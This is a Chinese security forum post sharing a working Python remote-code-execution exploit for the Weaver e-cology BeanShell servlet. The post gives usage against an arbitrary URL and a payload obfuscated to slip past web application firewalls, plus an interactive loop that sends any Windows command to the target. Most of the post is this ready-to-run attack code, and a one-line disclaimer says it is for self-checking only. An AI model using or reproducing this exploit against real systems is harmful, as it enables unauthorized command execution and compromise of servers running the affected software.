用户
搜索
  • TA的每日心情

    2018-8-18 10:11
  • 签到天数: 1 天

    连续签到: 1 天

    [LV.1]初来乍到

    版主

    Rank: 7Rank: 7Rank: 7

    6

    主题

    17

    帖子

    137

    魔法币
    收听
    0
    粉丝
    5
    注册时间
    2018-7-24

    i春秋认证积极活跃奖核心白帽

    发表于 2019-9-25 15:39:18 11823

    漏洞原理

    https://xz.aliyun.com/t/6418

    使用方法

    python3 rce.py http://www.baidu.com

    image

    payload是捡的,可以一定程度上bypass waf

    源码

    随手撸的

    import requests
    import sys
    
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    def exploit(url,cmd):
        target=url+'/weaver/bsh.servlet.BshServlet'
        payload='bsh.script=eval%00("ex"%2b"ec(\\"cmd+/c+{}\\")");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw'.format(cmd)
        res=requests.post(url=target,data=payload,headers=headers,timeout=10)
        res.encoding=res.apparent_encoding
        print(res.text)
    
    if __name__ == '__main__':
        url=sys.argv[1]
        while(1):
            cmd=input('cmd:')
            exploit(url,cmd)

    警告!脚本仅供用于资产自检,请勿用于非法用途!

    个人星球:https://yzddmr6.tk/posts/webshell-venom-notice/
    发表于 2019-9-25 15:46:45
    个人星球:https://yzddmr6.tk/posts/webshell-venom-notice/
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册